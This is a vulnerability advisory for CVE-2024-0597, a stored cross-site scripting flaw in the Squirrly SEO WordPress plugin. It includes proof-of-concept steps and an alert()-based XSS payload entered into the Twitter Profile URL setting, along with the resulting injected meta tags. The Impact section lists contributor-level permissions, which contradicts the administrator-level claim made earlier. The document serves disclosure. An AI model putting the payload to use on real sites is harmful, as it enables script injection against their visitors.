CVE-2024-0597 — SEO Plugin by Squirrly SEO WP Plugin <= 12.3.15 Administrator+ Stored Cross-Site Scritpting

The SEO Plugin by Squirrly SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to and including 12.3.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.

Proof of Concepts

1. When the plugin is installed, open the OnePage Setup page (/wp-admin/admin.php?page=sq_onpagesetup)
2. In step 4 (OnePage Setup), enter the payload in the Twitter Profile URL input form: https://twitter.com/twitter\"><img src onerror=alert(123)>
3. Complete the setup process then open your WordPress page.

The XSS payload will be triggered in the Twitter meta tag section:

<meta property="twitter:creator" content="@twitter\\"><img src onerror=alert(123)>" />
<meta property="twitter:site" content="@twitter\\"><img src onerror=alert(123)>" />

Impact

This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

Links

• SEO Plugin by Squirrly SEO <= 12.3.15 - Authenticated(Administrator+) Stored Cross-Site Scripting via plugin settings
• CVE-2024-0597 - NIST.GOV